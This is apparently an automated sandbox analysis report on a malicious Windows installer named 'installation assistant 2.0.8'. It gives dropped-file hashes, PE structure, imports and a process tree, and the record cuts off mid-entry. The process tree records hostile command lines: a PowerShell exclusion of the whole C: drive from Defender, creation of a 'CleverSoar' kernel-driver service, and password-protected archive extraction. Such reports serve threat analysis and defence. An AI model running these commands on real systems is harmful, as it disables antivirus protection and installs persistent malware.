                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3598848
                                          Entropy (8bit):7.004949099807939
                                          Encrypted:false
                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3366912
                                          Entropy (8bit):6.530548291878271
                                          Encrypted:false
                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3366912
                                          Entropy (8bit):6.530548291878271
                                          Encrypted:false
                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):6144
                                          Entropy (8bit):4.720366600008286
                                          Encrypted:false
                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3598848
                                          Entropy (8bit):7.004949099807939
                                          Encrypted:false
                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:ASCII text, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):406
                                          Entropy (8bit):5.117520345541057
                                          Encrypted:false
                                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                          MD5:9200058492BCA8F9D88B4877F842C148
                                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                          Malicious:false
                                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.921087624135217
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 98.04%
                                          • Inno Setup installer (109748/4) 1.08%
                                          • InstallShield setup (43055/19) 0.42%
                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                          File name:#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          File size:5'707'365 bytes
                                          MD5:65296edf39a492d0d9dbe2c7b6735df7
                                          SHA1:b256b2f4f2537239b244e131c33418bbf2723b8b
                                          SHA256:07287146cb055a3a593306fcb09d498f6b2a533f68aeb43e28ebccd2fc1c1e3f
                                          SHA512:45f43460fe66722e17e9e7f301321335e9d31abbf6d8458e236b2d882171eb4baa227f4a91452128c7e0f13be2f85f3edbefa995947dedb3105da5465dee965f
                                          SSDEEP:98304:XwREH1zu2+J1cx3RRw6Fw4fHPEnkQncsAsXZV8U4dBYmEWYbAjoibWNUtmKdMwZO:lAHTcxBRhw4fHcpXL8U43PEbUomWCtmh
                                          TLSH:F7461213F2CBE13EE05E0B3B0AB2B15494FB6A506422AD1696EC74ECCF751601E3E657
                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                          Icon Hash:0c0c2d33ceec80aa
                                          Entrypoint:0x4a83bc
                                          Entrypoint Section:.itext
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:1
                                          File Version Major:6
                                          File Version Minor:1
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:1
                                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          add esp, FFFFFFA4h
                                          push ebx
                                          push esi
                                          push edi
                                          xor eax, eax
                                          mov dword ptr [ebp-3Ch], eax
                                          mov dword ptr [ebp-40h], eax
                                          mov dword ptr [ebp-5Ch], eax
                                          mov dword ptr [ebp-30h], eax
                                          mov dword ptr [ebp-38h], eax
                                          mov dword ptr [ebp-34h], eax
                                          mov dword ptr [ebp-2Ch], eax
                                          mov dword ptr [ebp-28h], eax
                                          mov dword ptr [ebp-14h], eax
                                          mov eax, 004A2EBCh
                                          call 00007FBE3877ABA5h
                                          xor eax, eax
                                          push ebp
                                          push 004A8AC1h
                                          push dword ptr fs:[eax]
                                          mov dword ptr fs:[eax], esp
                                          xor edx, edx
                                          push ebp
                                          push 004A8A7Bh
                                          push dword ptr fs:[edx]
                                          mov dword ptr fs:[edx], esp
                                          mov eax, dword ptr [004B0634h]
                                          call 00007FBE3880C52Bh
                                          call 00007FBE3880C07Eh
                                          lea edx, dword ptr [ebp-14h]
                                          xor eax, eax
                                          call 00007FBE38806D58h
                                          mov edx, dword ptr [ebp-14h]
                                          mov eax, 004B41F4h
                                          call 00007FBE38774C53h
                                          push 00000002h
                                          push 00000000h
                                          push 00000001h
                                          mov ecx, dword ptr [004B41F4h]
                                          mov dl, 01h
                                          mov eax, dword ptr [0049CD14h]
                                          call 00007FBE38808083h
                                          mov dword ptr [004B41F8h], eax
                                          xor edx, edx
                                          push ebp
                                          push 004A8A27h
                                          push dword ptr fs:[edx]
                                          mov dword ptr fs:[edx], esp
                                          call 00007FBE3880C5B3h
                                          mov dword ptr [004B4200h], eax
                                          mov eax, dword ptr [004B4200h]
                                          cmp dword ptr [eax+0Ch], 01h
                                          jne 00007FBE3881329Ah
                                          mov eax, dword ptr [004B4200h]
                                          mov edx, 00000028h
                                          call 00007FBE38808978h
                                          mov edx, dword ptr [004B4200h]
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          .rsrc0xcb0000x110000x11000fe932d5676ad361c48f8d49d8256c9dbFalse0.18784466911764705data3.7211238544779355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                          RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                          RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                          RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                          RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                          RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                          RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                          RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                          RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                          RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                          RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                          RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                          RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                          RT_STRING0xd8e000x3f8data0.3198818897637795
                                          RT_STRING0xd91f80x2dcdata0.36475409836065575
                                          RT_STRING0xd94d40x430data0.40578358208955223
                                          RT_STRING0xd99040x44cdata0.38636363636363635
                                          RT_STRING0xd9d500x2d4data0.39226519337016574
                                          RT_STRING0xda0240xb8data0.6467391304347826
                                          RT_STRING0xda0dc0x9cdata0.6410256410256411
                                          RT_STRING0xda1780x374data0.4230769230769231
                                          RT_STRING0xda4ec0x398data0.3358695652173913
                                          RT_STRING0xda8840x368data0.3795871559633027
                                          RT_STRING0xdabec0x2a4data0.4275147928994083
                                          RT_RCDATA0xdae900x10data1.5
                                          RT_RCDATA0xdaea00x310data0.6173469387755102
                                          RT_RCDATA0xdb1b00x2cdata1.1590909090909092
                                          RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                          RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                                          RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                          DLLImport
                                          kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                          comctl32.dllInitCommonControls
                                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                          advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                          NameOrdinalAddress
                                          __dbk_fcall_wrapper20x40fc10
                                          dbkFCallWrapperAddr10x4b063c
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 23, 2024 09:15:52.653496027 CET1.1.1.1192.168.2.50x48e9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                          Dec 23, 2024 09:15:52.653496027 CET1.1.1.1192.168.2.50x48e9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:03:15:36
                                          Start date:23/12/2024
                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
                                          Imagebase:0xd50000
                                          File size:5'707'365 bytes
                                          MD5 hash:65296EDF39A492D0D9DBE2C7B6735DF7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:03:15:36
                                          Start date:23/12/2024
                                          Path:C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
                                          Imagebase:0xd00000
                                          File size:3'366'912 bytes
                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:15:37
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:15:37
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:03:15:37
                                          Start date:23/12/2024
                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
                                          Imagebase:0xd50000
                                          File size:5'707'365 bytes
                                          MD5 hash:65296EDF39A492D0D9DBE2C7B6735DF7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Reputation:low
                                          Has exited:false

                                          Target ID:6
                                          Start time:03:15:38
                                          Start date:23/12/2024
                                          Path:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
                                          Imagebase:0x600000
                                          File size:3'366'912 bytes
                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:15:41
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                          Imagebase:0x7ff7a56f0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                          Imagebase:0x7ff74b980000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                          Wow64 process (32bit):true
                                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                          Imagebase:0x890000
                                          File size:831'200 bytes
                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 0%, ReversingLabs
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:11
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:03:15:42
                                          Start date:23/12/2024
                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                          Wow64 process (32bit):true
                                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                          Imagebase:0x890000
                                          File size:831'200 bytes
                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                          Has elevated privileges:true
                                          Has administrator privileges:true
